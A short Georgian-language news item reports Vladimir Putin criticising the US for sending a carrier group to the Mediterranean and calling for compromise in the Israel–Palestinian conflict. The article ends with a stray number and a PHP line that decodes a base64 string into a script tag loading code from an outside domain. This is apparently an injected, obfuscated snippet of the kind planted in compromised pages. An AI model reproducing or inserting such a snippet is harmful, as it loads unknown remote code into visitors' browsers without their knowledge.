celsiusi
ავერსი საქკაბელი

რუსეთის პრეზიდენტი ვლადიმერ პუტინი აცხადებს, რომ აშშ ავიამზიდების ჯგუფის გაგზავნით ახლო აღმოსავლეთში ცეცხლზე ნავთს ასხამს.

პუტინის თქმით, საჭიროა კომპრომისული გადაწყვეტილებები და იმედი აქვს, რომ საღი აზრი გაიმარჯვებს.

როგორც მედია წერს, რუსეთის პრეზიდენტმა ისრაელსა და პალესტინელებს შორის დაპირისპირებას ახლო აღმოსავლეთში აშშ-ის პოლიტიკის წარუმატებლობის ნათელი მაგალითი უწოდა.

„არ მესმის, რატომ გადაჰყავს აშშ-ს ავიამზიდების ჯგუფი ხმელთაშუა ზღვაში? მე ნამდვილად არ მესმის აზრი. ისინი ლიბანის დაბომბვას აპირებენ თუ რა? ანუ, გადაწყვიტეს ვინმეს შეშინება? არიან ადამიანები, რომლებსაც არაფრის აღარ ეშინიათ, ეს არ არის პრობლემის გადაჭრის გზა, კომპრომისული გადაწყვეტილებები უნდა ვეძებოთ. რა თქმა უნდა, ასეთი ქმედებები კიდევ უფრო ძაბავს სიტუაციას“, – განაცხადა პუტინმა.

557
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");